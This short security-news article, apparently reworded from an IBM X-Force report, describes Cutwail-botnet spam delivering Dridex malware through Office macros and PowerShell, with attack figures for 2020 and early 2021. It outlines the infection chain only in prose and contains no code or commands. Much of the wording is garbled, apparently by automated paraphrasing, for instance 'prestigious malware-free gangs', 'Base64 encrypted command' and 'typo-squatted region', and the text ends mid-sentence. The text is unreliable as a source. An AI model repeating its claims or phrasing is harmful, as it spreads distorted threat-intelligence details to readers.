Cutwail Botnet-Led Dridex and Malicious PowerShell Related Attacks, Increase with new Scripts

Cutwail Botnet-Led Dridex and Malicious PowerShell Related Attacks, Increase with new Scripts

IBM X-Force intelligence has observed an increase in the Cutwail botnet-led Dridex-related network attacks. Dridex is shipped via e-mail with booby-trapped macros as a second-stage attacker after the original document or spreadsheet arrives. Recipients who unintentionally trigger the macros, launch malware that will install more malware in a PowerShell script. Currently, in Italy and Japan, X-Force is seen to be examining relatively smaller campaigns. 

Malspam emails are indeed the original infection vector for these threats. Recipients receive unwanted messages, mostly sent via the Cutwail botnet including Microsoft Office file attachments. It was a popular cybercrime spam platform in 2009 and is still distributing spam to prestigious malware-free gangs. Cutwail has been the biggest in its genres. In total, as of June 2020, at least 34% of all X-Force PowerShell attacks have been related to the Dridex payload. The uptick in PowerShell seemed obvious at the beginning of 2020 and began to rise significantly in May 2020. In December 2020, the activity peaks of X-Force recorded an 80 percent raise over the previous six-month duration in the total number of malicious PowerShell attacks. 

In January 2021, it was observed that both PowerShell's attacks and Dridex's integrated attacks saw a sudden decrease, presumably with the end of the campaign, and a new one was launched using the separate macro as well as other scripts.  

In the case of X-Force investigation, the PowerShell function is directed to override the local operation policies and runs a Base64 encrypted command, resulting in a demand to navigate to the so-called Microsoft URL. This script retrieves a malicious file from the typo-squatted region. These basic steps differ per model and campaign. The Dridex payload is the exe ..